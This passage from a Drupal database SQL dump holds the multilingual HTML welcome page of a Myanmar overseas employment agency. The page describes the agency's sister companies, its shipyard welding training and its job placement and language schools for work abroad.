lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 147, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 147, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 147, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 